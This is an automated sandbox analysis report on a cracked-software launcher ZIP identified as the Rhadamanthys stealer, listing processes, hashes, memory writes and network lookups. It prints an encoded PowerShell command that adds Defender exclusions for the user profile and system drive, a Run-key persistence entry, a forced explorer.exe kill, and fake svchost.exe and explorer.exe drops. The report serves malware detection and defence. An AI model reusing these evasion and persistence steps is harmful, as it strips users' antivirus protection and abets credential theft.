Malware Analysis Report

2024-11-15 05:58

Sample ID 240405-ag4sgafb77
Target ICracklauncher.zip
SHA256 b67042a291ac385fe187641834a55613a4533ed69863ec8d5d50d59274e8609b
Tags
rhadamanthys pyinstaller stealer upx persistence
Score
10/10

Analysis Overview

Score
10/10

SHA256

b67042a291ac385fe187641834a55613a4533ed69863ec8d5d50d59274e8609b

Threat Level: Known bad

The file ICracklauncher.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys pyinstaller stealer upx persistence

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

UPX packed file

Adds Run key to start application

Enumerates physical storage devices

Detects Pyinstaller

Unsigned PE

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Analysis: static1

Detonation Overview

Reported

2024-04-05 00:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win7-20240221-en

Max time kernel

117s

Max time network

122s

Command Line

C:\Windows\Explorer.EXE

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1404 created 1336 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\Explorer.EXE

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\explorer.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 2528 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 2528 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 2528 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 1404 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\iCrack.exe

"C:\Users\Admin\AppData\Local\Temp\iCrack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

Network

N/A

Files

\Users\Admin\AppData\Roaming\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

memory/1248-12-0x00000000023F0000-0x000000000245D000-memory.dmp

memory/1248-9-0x00000000023F0000-0x000000000245D000-memory.dmp

memory/1404-13-0x0000000000210000-0x000000000027D000-memory.dmp

\Users\Admin\AppData\Local\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

C:\Users\Admin\AppData\Local\Temp\_MEI25282\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

memory/2600-35-0x000007FEF6560000-0x000007FEF69C6000-memory.dmp

memory/1404-38-0x0000000002E10000-0x0000000003210000-memory.dmp

memory/1404-40-0x0000000002E10000-0x0000000003210000-memory.dmp

memory/1404-41-0x0000000077A10000-0x0000000077BB9000-memory.dmp

memory/1404-42-0x0000000002E10000-0x0000000003210000-memory.dmp

memory/1404-44-0x00000000776E0000-0x0000000077727000-memory.dmp

memory/2496-45-0x0000000000080000-0x0000000000089000-memory.dmp

memory/1404-46-0x0000000000210000-0x000000000027D000-memory.dmp

memory/2332-48-0x00000000746D0000-0x0000000074C7B000-memory.dmp

memory/2332-49-0x00000000746D0000-0x0000000074C7B000-memory.dmp

memory/2332-50-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2496-52-0x00000000006B0000-0x0000000000AB0000-memory.dmp

memory/2496-53-0x00000000006B0000-0x0000000000AB0000-memory.dmp

memory/2496-55-0x0000000077A10000-0x0000000077BB9000-memory.dmp

memory/2496-57-0x00000000776E0000-0x0000000077727000-memory.dmp

memory/2332-58-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2496-59-0x0000000077A10000-0x0000000077BB9000-memory.dmp

memory/2332-60-0x00000000026D0000-0x0000000002710000-memory.dmp

memory/2496-61-0x00000000006B0000-0x0000000000AB0000-memory.dmp

memory/2332-62-0x00000000746D0000-0x0000000074C7B000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win7-20240221-en

Max time kernel

119s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\DrakeUI.Framework.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4024 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 99.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 241.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

139s

Max time network

159s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\config.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 145.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240226-en

Max time kernel

92s

Max time network

96s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 227.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-04-05 00:11

Reported

2024-04-05 00:15

Platform

win10v2004-20240319-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 868 created 2888 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\svchost.exe

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iCrack.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-817259280-2658881748-983986378-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" C:\Users\Admin\explorer.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5096 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5096 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5096 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5096 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 5096 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\iCrack.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1384 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 1384 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Users\Admin\AppData\Local\explorer.exe
PID 4652 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\explorer.exe C:\Windows\system32\cmd.exe
PID 4920 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4920 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4920 wrote to memory of 344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\explorer.exe
PID 4920 wrote to memory of 344 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\explorer.exe
PID 344 wrote to memory of 2788 N/A C:\Users\Admin\explorer.exe C:\Users\Admin\explorer.exe
PID 344 wrote to memory of 2788 N/A C:\Users\Admin\explorer.exe C:\Users\Admin\explorer.exe
PID 2788 wrote to memory of 2744 N/A C:\Users\Admin\explorer.exe C:\Windows\system32\cmd.exe
PID 2788 wrote to memory of 2744 N/A C:\Users\Admin\explorer.exe C:\Windows\system32\cmd.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe
PID 868 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Users\Admin\AppData\Local\Temp\iCrack.exe

"C:\Users\Admin\AppData\Local\Temp\iCrack.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAegBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AegB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwByACMAPgA="

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Users\Admin\AppData\Local\explorer.exe

"C:\Users\Admin\AppData\Local\explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat

C:\Windows\system32\taskkill.exe

taskkill /f /im "explorer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Users\Admin\explorer.exe

"explorer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3764 --field-trial-handle=2228,i,17475224967547320003,13667387715861799238,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.34.115.104.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
NL 142.251.39.106:443 tcp
US 8.8.8.8:53 145.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

memory/868-11-0x0000000000610000-0x000000000067D000-memory.dmp

C:\Users\Admin\AppData\Local\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

C:\Users\Admin\AppData\Local\Temp\_MEI13842\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

C:\Users\Admin\AppData\Local\Temp\_MEI13842\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

memory/3340-38-0x0000000002CD0000-0x0000000002D06000-memory.dmp

memory/3340-40-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

memory/3340-39-0x0000000073B20000-0x00000000742D0000-memory.dmp

memory/4652-42-0x00007FFFA84D0000-0x00007FFFA8936000-memory.dmp

memory/3340-41-0x00000000055F0000-0x0000000005C18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_ctypes.pyd

MD5 48ce90022e97f72114a95630ba43b8fb
SHA1 f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA256 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
SHA512 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

memory/4652-56-0x00007FFFBAE90000-0x00007FFFBAEB4000-memory.dmp

memory/4652-57-0x00007FFFC06F0000-0x00007FFFC06FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_lzma.pyd

MD5 7c66f33a67fbb4d99041f085ef3c6428
SHA1 e1384891df177b45b889459c503985b113e754a3
SHA256 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866
SHA512 d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_bz2.pyd

MD5 f6e387f20808828796e876682a328e98
SHA1 6679ae43b0634ac706218996bac961bef4138a02
SHA256 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b
SHA512 ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

C:\Users\Admin\activate.bat

MD5 fbcbd43fa00e29f002495e4ab2dc4782
SHA1 75aad7a3fa21226bf37ff89da953743d2b650dc0
SHA256 7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648
SHA512 4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_socket.pyd

MD5 0dd957099cf15d172d0a343886fb7c66
SHA1 950f7f15c6accffac699c5db6ce475365821b92a
SHA256 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a
SHA512 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

memory/3340-66-0x0000000005310000-0x0000000005332000-memory.dmp

memory/4652-67-0x00007FFFBADA0000-0x00007FFFBADB8000-memory.dmp

memory/4652-68-0x00007FFFBA620000-0x00007FFFBA64C000-memory.dmp

memory/3340-70-0x0000000005C90000-0x0000000005CF6000-memory.dmp

memory/3340-69-0x0000000005C20000-0x0000000005C86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkbrb2dq.xa4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_hashlib.pyd

MD5 13f99120a244ab62af1684fbbc5d5a7e
SHA1 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724
SHA256 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b
SHA512 46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

memory/3340-80-0x0000000005D00000-0x0000000006054000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13842\_decimal.pyd

MD5 2030438e4f397a7d4241a701a3ca2419
SHA1 28b8d06135cd1f784ccabda39432cc83ba22daf7
SHA256 07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72
SHA512 767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

C:\Users\Admin\AppData\Local\Temp\_MEI13842\unicodedata.pyd

MD5 dfa1f0cd0ad295b31cb9dda2803bbd8c
SHA1 cc68460feae2ff4e9d85a72be58c8011cb318bc2
SHA256 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10
